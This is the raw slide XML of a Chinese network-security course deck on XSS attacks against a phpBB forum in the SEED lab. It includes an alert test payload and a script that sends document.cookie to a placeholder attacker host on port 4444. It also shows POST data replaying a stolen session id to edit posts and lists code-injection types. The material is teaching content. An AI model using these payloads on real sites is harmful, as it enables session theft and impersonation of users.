          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SEED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>实验环境中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>phpBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>论坛存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="2276872"/>
            <a:ext cx="7848872" cy="4392488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1889744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95534" y="-99392"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击实例</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>漏洞 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(’XSS’);&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619672" y="2276872"/>
            <a:ext cx="6624736" cy="3888432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592840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7384"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击实例</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>窃取用户的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=http://attacker_IP_address:4444?c=”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> +“ &gt;”); &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术与实践课程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诸葛建伟</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="2976516"/>
            <a:ext cx="6264696" cy="3861048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2221071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99392"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击实例</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>假冒其他用户修改帖子  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Live HTTP Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>插件记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>改变帖子内容，通过窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>假冒身份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>data="subject=Re%3A+Stealing+your+cookie&amp;…&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>message=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i+can+see+it+now+just+refresh+it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>&amp;mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>reply&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=6d47ed39784d</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>300851ba04295e406770</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&amp;t=36&amp;post=Submit";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用窃取到的用户会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>urlConn.addRequestProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>("Cookie"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>跨站脚本假冒其他用户身份修改内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>URLConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>类等编写攻击程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Live HTTP Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>直接发送修改数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266302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8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1412776"/>
            <a:ext cx="8001000" cy="4484712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序的输入验证不完善漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行由攻击者所注入的恶意指令和代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>敏感信息泄露、权限提升或对系统的未授权访问 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多样化的代码注入攻击类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入攻击：恶意读取、修改与操纵数据库；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入攻击：植入和运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入攻击：恶意执行操作系统命令的；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其他多样化注入攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入、邮件命令注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入等 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1488" y="6553150"/>
            <a:ext cx="1981200" cy="476250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{519535F7-5351-E14C-A73A-194DEFCD5AC9}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1053048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7384"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击实例</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3500" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3500" dirty="0"/>
              <a:t>蠕虫  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500"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30</a:t>
            </a:fld>
